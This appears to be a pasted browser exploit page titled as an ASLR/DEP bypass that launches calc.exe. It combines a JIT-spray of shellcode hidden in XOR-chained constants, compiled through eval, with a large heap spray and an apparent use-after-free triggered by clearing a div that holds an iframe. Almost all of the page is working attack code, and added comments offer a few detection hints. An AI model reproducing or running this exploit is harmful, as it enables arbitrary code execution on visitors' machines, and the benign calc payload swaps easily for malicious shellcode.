win exploit_aslr_dep_bypass_calc_exe

a guest
Mar 28th, 2017
  1. <html>
  2. <head>
  3. <!-- Shellcode calc.exe -->
  4. <script type="text/javascript">
/*
 * Source text used as the body of every generated function below (see the
 * loop that follows this constant): a single expression built from 32-bit
 * immediates joined by `^`, assigned to `y` and returned. Per the HTML
 * comment at the top of this script, the immediates carry the calc.exe
 * shellcode; nothing in this file decodes them in JavaScript — they only
 * ever reach the engine through eval of the generated source.
 */
var F =
"{ var y=(" +
"0x22222222^0x22222222^0x22222222^0x22222222^0x22222222^" +
"0x22222222^0x074fffb8^0x075000ec^0x14eb00b2^0x14eb00b6^" +
"0x14ebd189^0x14ebdb33^0x14eb04b3^0x14ebc031^0x14eb0bb4^" +
"0x14ebb5b0^0x14ebe0f7^0x14ebe8b4^0x14ebfcb0^0x14ebcb03^" +
"0x14eb0189^0x14ebc031^0x14ebbbb4^0x14eb88b0^0x14ebe0f7^" +
"0x14ebffb4^0x14ebffb0^0x14eb4090^0x14eb00b4^0x14eb00b0^" +
"0x14ebcb03^0x14eb0189^0x14ebc031^0x14eba0b4^0x14eba8b0^" +
"0x14ebe0f7^0x14eb31b4^0x14ebe5b0^0x14ebcb03^0x14eb0189^" +
"0x14ebc031^0x14ebbcb4^0x14ebc4b0^0x14ebe0f7^0x14eb52b4^" +
"0x14eb8bb0^0x14ebcb03^0x14eb0189^0x14ebc031^0x14eb91b4^" +
"0x14eb5eb0^0x14ebe0f7^0x14eb0cb4^0x14eb52b0^0x14ebcb03^" +
"0x14eb0189^0x14ebc031^0x14eb65b4^0x14ebc2b0^0x14ebe0f7^" +
"0x14eb8bb4^0x14eb14b0^0x14ebcb03^0x14eb0189^0x14ebc031^" +
"0x14eb63b4^0x14eb02b0^0x14ebe0f7^0x14ebb7b4^0x14eb0fb0^" +
"0x14ebcb03^0x14eb0189^0x14ebc031^0x14ebddb4^0x14ebd0b0^" +
"0x14ebe0f7^0x14ebffb4^0x14ebffb0^0x14eb4090^0x14ebffb4^" +
"0x14eb31b0^0x14ebcb03^0x14eb0189^0x14ebc031^0x14ebb2b4^" +
"0x14eb71b0^0x14ebe0f7^0x14eb3cb4^0x14ebacb0^0x14ebcb03^" +
"0x14eb0189^0x14ebc031^0x14ebdeb4^0x14eb5ab0^0x14ebe0f7^" +
"0x14eb2cb4^0x14eb02b0^0x14ebcb03^0x14eb0189^0x14ebc031^" +
"0x14ebe1b4^0x14ebb6b0^0x14ebe0f7^0x14eb0db4^0x14ebcfb0^" +
"0x14ebcb03^0x14eb0189^0x14ebc031^0x14eb95b4^0x14eb84b0^" +
"0x14ebe0f7^0x14ebf0b4^0x14ebe2b0^0x14ebcb03^0x14eb0189^" +
"0x14ebc031^0x14ebbcb4^0x14ebaeb0^0x14ebe0f7^0x14eb52b4^" +
"0x14eb8bb0^0x14ebcb03^0x14eb0189^0x14ebc031^0x14ebe6b4^" +
"0x14ebc2b0^0x14ebe0f7^0x14eb3cb4^0x14eb42b0^0x14ebcb03^" +
"0x14eb0189^0x14ebc031^0x14ebb8b4^0x14ebd9b0^0x14ebe0f7^" +
"0x14eb40b4^0x14eb8bb0^0x14ebcb03^0x14eb0189^0x14ebc031^" +
"0x14eb12b4^0x14eb2bb0^0x14ebe0f7^0x14eb74b4^0x14ebc0b0^" +
"0x14ebcb03^0x14eb0189^0x14ebc031^0x14eb88b4^0x14eb47b0^" +
"0x14ebe0f7^0x14eb50b4^0x14ebd0b0^0x14ebcb03^0x14eb0189^" +
"0x14ebc031^0x14eb5ab4^0x14ebffb0^0x14ebe0f7^0x14eb8bb4^" +
"0x14eb18b0^0x14ebcb03^0x14eb0189^0x14ebc031^0x14eb7cb4^" +
"0x14ebdab0^0x14ebe0f7^0x14ebd3b4^0x14eb01b0^0x14ebcb03^" +
"0x14eb0189^0x14ebc031^0x14ebbcb4^0x14ebc7b0^0x14ebe0f7^" +
"0x14eb8bb4^0x14eb49b0^0x14ebcb03^0x14eb0189^0x14ebc031^" +
"0x14ebffb4^0x14eb98b0^0x14ebe0f7^0x14ebffb4^0x14ebffb0^" +
"0x14eb4090^0x14ebd6b4^0x14eb01b0^0x14ebcb03^0x14eb0189^" +
"0x14ebc031^0x14ebdeb4^0x14ebaab0^0x14ebe0f7^0x14ebffb4^" +
"0x14ebffb0^0x14eb4090^0x14ebc0b4^0x14eb31b0^0x14ebcb03^" +
"0x14eb0189^0x14ebc031^0x14ebe1b4^0x14ebb6b0^0x14ebe0f7^" +
"0x14eb0db4^0x14ebcfb0^0x14ebcb03^0x14eb0189^0x14ebc031^" +
"0x14ebfab4^0x14eb29b0^0x14ebe0f7^0x14ebffb4^0x14ebffb0^" +
"0x14eb4090^0x14ebe0b4^0x14eb38b0^0x14ebcb03^0x14eb0189^" +
"0x14ebc031^0x14eb7bb4^0x14ebe8b0^0x14ebe0f7^0x14eb7db4^" +
"0x14eb03b0^0x14ebcb03^0x14eb0189^0x14ebc031^0x14ebf0b4^" +
"0x14ebc7b0^0x14ebe0f7^0x14eb24b4^0x14eb7db0^0x14ebcb03^" +
"0x14eb0189^0x14ebc031^0x14eb60b4^0x14eb76b0^0x14ebe0f7^" +
"0x14eb8bb4^0x14eb58b0^0x14ebcb03^0x14eb0189^0x14ebc031^" +
"0x14ebbcb4^0x14ebe8b0^0x14ebe0f7^0x14ebffb4^0x14ebffb0^" +
"0x14eb4090^0x14ebd3b4^0x14eb01b0^0x14ebcb03^0x14eb0189^" +
"0x14ebc031^0x14eb96b4^0x14eb8fb0^0x14ebe0f7^0x14eb4bb4^" +
"0x14eb0cb0^0x14ebcb03^0x14eb0189^0x14ebc031^0x14ebbdb4^" +
"0x14eb32b0^0x14ebe0f7^0x14ebffb4^0x14ebffb0^0x14eb4090^" +
"0x14eb01b4^0x14eb1cb0^0x14ebcb03^0x14eb0189^0x14ebc031^" +
"0x14ebe6b4^0x14ebc2b0^0x14ebe0f7^0x14eb8bb4^0x14eb04b0^" +
"0x14ebcb03^0x14eb0189^0x14ebc031^0x14eb60b4^0x14eb30b0^" +
"0x14ebe0f7^0x14eb44b4^0x14eb89b0^0x14ebcb03^0x14eb0189^" +
"0x14ebc031^0x14eb97b4^0x14eb44b0^0x14ebe0f7^0x14eb5bb4^" +
"0x14eb5bb0^0x14ebcb03^0x14eb0189^0x14ebc031^0x14ebefb4^" +
"0x14ebffb0^0x14ebe0f7^0x14ebffb4^0x14ebffb0^0x14eb4090^" +
"0x14eb51b4^0x14eb5ab0^0x14ebcb03^0x14eb0189^0x14ebc031^" +
"0x14ebbcb4^0x14ebe0b0^0x14ebe0f7^0x14ebffb4^0x14ebffb0^" +
"0x14eb4090^0x14eb5fb4^0x14eb58b0^0x14ebcb03^0x14eb0189^" +
"0x14ebc031^0x14eb9ab4^0x14ebbcb0^0x14ebe0f7^0x14ebebb4^" +
"0x14eb12b0^0x14ebcb03^0x14eb0189^0x14ebc031^0x14ebb8b4^" +
"0x14ebe7b0^0x14ebe0f7^0x14ebffb4^0x14ebffb0^0x14eb4090^" +
"0x14eb01b4^0x14eb6ab0^0x14ebcb03^0x14eb0189^0x14ebc031^" +
"0x14eb00b4^0x14eb00b0^0x14ebe0f7^0x14eb00b4^0x14ebb9b0^" +
"0x14ebcb03^0x14eb0189^0x14ebc031^0x14ebbcb4^0x14ebc5b0^" +
"0x14ebe0f7^0x14eb68b4^0x14eb50b0^0x14ebcb03^0x14eb0189^" +
"0x14ebc031^0x14ebeab4^0x14eb0fb0^0x14ebe0f7^0x14eb87b4^" +
"0x14eb6fb0^0x14ebcb03^0x14eb0189^0x14ebc031^0x14ebccb4^" +
"0x14eb17b0^0x14ebe0f7^0x14ebffb4^0x14ebffb0^0x14eb4090^" +
"0x14ebf0b4^0x14ebbbb0^0x14ebcb03^0x14eb0189^0x14ebc031^" +
"0x14ebc3b4^0x14ebbbb0^0x14ebe0f7^0x14eb68b4^0x14eb56b0^" +
"0x14ebcb03^0x14eb0189^0x14ebc031^0x14ebeab4^0x14eb0fb0^" +
"0x14ebe0f7^0x14eb9db4^0x14ebbdb0^0x14ebcb03^0x14eb0189^" +
"0x14ebc031^0x14eb33b4^0x14ebcfb0^0x14ebe0f7^0x14eb06b4^" +
"0x14eb3cb0^0x14ebcb03^0x14eb0189^0x14ebc031^0x14ebadb4^" +
"0x14ebb7b0^0x14ebe0f7^0x14ebfbb4^0x14eb80b0^0x14ebcb03^" +
"0x14eb0189^0x14ebc031^0x14eb46b4^0x14eb40b0^0x14ebe0f7^" +
"0x14ebbbb4^0x14eb05b0^0x14ebcb03^0x14eb0189^0x14ebc031^" +
"0x14eb0ab4^0x14eb4cb0^0x14ebe0f7^0x14eb6fb4^0x14eb72b0^" +
"0x14ebcb03^0x14eb0189^0x14ebc031^0x14eb9fb4^0x14ebdeb0^" +
"0x14ebe0f7^0x14ebffb4^0x14eb53b0^0x14ebcb03^0x14eb0189^" +
"0x14ebc031^0x14eb6cb4^0x14ebf9b0^0x14ebe0f7^0x14eb6cb4^" +
"0x14eb61b0^0x14ebcb03^0x14eb0189^0x14ebc031^0x14eb0ab4^" +
"0x14eb0db0^0x14ebe0f7^0x14eb78b4^0x14eb65b0^0x14ebcb03^" +
"0x14eb0189^0x14ebc031^0x14ebc0b4^0x14eb60b0^0x14ebe0f7^" +
"0x14eb90b4^0x14eb90b0^0x14ebcb03^0x14eb0189^0x14eb00b5^" +
"0x14eb04b1^0x14ebe1ff" +
"); return y; }";
/*
 * Builds one large source string that declares fct_1 … fct_799, each with
 * the body F, and calls each one immediately after its declaration; the
 * whole string is then handed to eval. Presumably the point is to make the
 * engine compile the same body hundreds of times — inferred, not stated
 * here. Detection/mitigation note: eval of a multi-megabyte constructed
 * string defining hundreds of identically-bodied functions is a strong
 * signal on its own, and a Content-Security-Policy without 'unsafe-eval'
 * blocks this statement outright.
 */
var S="";
for (var i=1;i<800;i++)
S += "function fct_" + i + "()" + F + " fct_" + i + "();";
eval(S);
  105. </script>
  107. <script type="text/javascript">
/**
 * Encodes a 32-bit integer as a two-character string: the low 16 bits
 * become the first UTF-16 code unit, the high bits the second
 * (little-endian halves). `>>` is an arithmetic shift, so an input with
 * bit 31 set produces a negative high half, which fromCharCode reduces
 * modulo 2^16.
 * @param {number} a - 32-bit integer
 * @returns {string} two UTF-16 code units, low half first
 */
function dword(a) {
  const lowHalf = a & 0xFFFF;
  const highHalf = a >> 16;
  return `${String.fromCharCode(lowHalf)}${String.fromCharCode(highHalf)}`;
}
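/**
 * Repeats `b` until it covers at least `s - 4` bytes (two bytes per UTF-16
 * code unit) and returns exactly (s - 4) / 2 code units of it. Why 4 bytes
 * are reserved out of `s` is not explained anywhere in this file.
 * @param {string} b - non-empty seed string to repeat
 * @param {number} s - target size in bytes
 * @returns {string} the first (s - 4) / 2 code units of the repeated seed
 * @throws {RangeError} when `b` is empty — the original doubling loop never
 *   terminates for an empty seed, so fail fast instead of hanging
 */
function BuildBlock(b, s) {
  if (b.length === 0) {
    throw new RangeError("BuildBlock: seed string must be non-empty");
  }
  const byteTarget = s - 4;
  let filled = b;
  // Doubling reaches the target length in O(log n) concatenations.
  while (filled.length * 2 < byteTarget) {
    filled += filled;
  }
  return filled.substring(0, byteTarget / 2);
}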
/*
 * Heap-spray routine: allocates 0x30000 strings, each built by BuildBlock
 * from a repeated 4-byte value, and keeps them all reachable via `blocks`.
 * It is invoked from window.onload as a plain call (no `new`) and this
 * script is not in strict mode, so `this` is the global object and
 * `blocks` ends up as a global property.
 * Detection note: a tight loop creating 0x30000 identical ~156-byte strings
 * (0xa0 bytes requested, minus the 4 BuildBlock reserves) is the
 * observable pattern here.
 */
function Spray()
{
this.blocks = new Array();

/* Fill the string with the address of the JIT shellcode. */
var slide = BuildBlock(dword(0x075000BC), 0xa0);

/* Creating 0x30000 blocks to fill the freed value. */
/* NOTE(review): [slide].join("") presumably yields a distinct string per
   iteration rather than 0x30000 references to `slide` — engine-dependent,
   not established by this file. */
for (var i=0;i<0x30000;i++) {this.blocks[i] = [slide].join("");}
}
/* Empty the document body on a 0 ms timer, i.e. once the current script has run to completion. */
setTimeout(() => {
  document.body.innerHTML = "";
}, 0);
/* On load: run the spray, empty the element with id "a", then run the spray a second time. */
window.onload = () => {
  Spray();
  document.getElementById("a").innerHTML = "";
  Spray();
};
  143. </script>
  144. </head>
  146. <body>
  147. <div id="a">
  148. <iframe src="_not_existing_">
  149. </div>
  150. </body>
  151. </html>
  155. BY SIVA ( DEKINGOFCYBER )